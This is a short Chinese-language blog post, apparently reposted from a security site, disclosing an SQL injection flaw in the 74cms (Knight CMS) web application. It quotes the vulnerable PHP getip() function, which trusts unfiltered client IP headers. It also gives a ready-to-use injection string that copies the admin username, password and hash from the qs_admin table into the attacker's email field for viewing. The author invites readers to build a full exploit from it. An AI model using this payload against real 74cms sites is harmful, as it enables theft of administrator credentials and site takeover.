74cms sql 骑士CMS 注入漏洞 - 脚本漏洞

  • A+
所属分类:lcx

    By:毅心毅意

    74cms sql 骑士CMS 注入漏洞 - 脚本漏洞

以下是引用片段:

function getip()
{
        if(getenv('HTTP_CLIENT_IP')){
                $onlineip=getenv('HTTP_CLIENT_IP');
        }else if(getenv('HTTP_X_FORWARDED_FOR')){
                $onlineip=getenv('HTTP_X_FORWARDED_FOR');
        }else if(getenv('REMOTE_ADDR')){
                $onlineip=getenv('REMOTE_ADDR');
        }else{
                $onlineip=$_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
}

    ip没过滤

    和子仪牛的这个漏洞很像http://www.t00ls.net/thread-14725-1-1.html。但是那个漏洞是用来提升权限。。。因为管理和会员在一个表。。。。。74cms的管理和会员不在一个表我们可以这样注入

$getinj="zyday1.1.', email=(SELECT concat(admin_name,0x2f,pwd,0x2f,pwd_hash ) FROM qs_admin) where username = '$dpusername'#";

    就是把查询到的账号密码赋值给email...接着在会员中心查看个人资料就可以爆账号和密码和hash了

    大体和子仪牛没什么区别了

    以前参考子仪牛的exp写了个exp。。。。但是弄丢了。。。不好意了

    有兴趣的同学可以写一下

文章来源于lcx.cc:74cms sql 骑士CMS 注入漏洞 - 脚本漏洞

相关推荐: 研究人员首次发现用于针对性攻击的Android木马

APT攻击已经不是什么新鲜事,但是以前一直是针对Windows和Mac OS X等平台的攻击,近日,卡巴斯基实验室的研究人员发现一次有针对性的APT攻击,其中利用了Android平台木马来进行钓鱼。 据卡巴斯基实验室的研究人员称,一位知名西藏活动人士的电子邮件…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: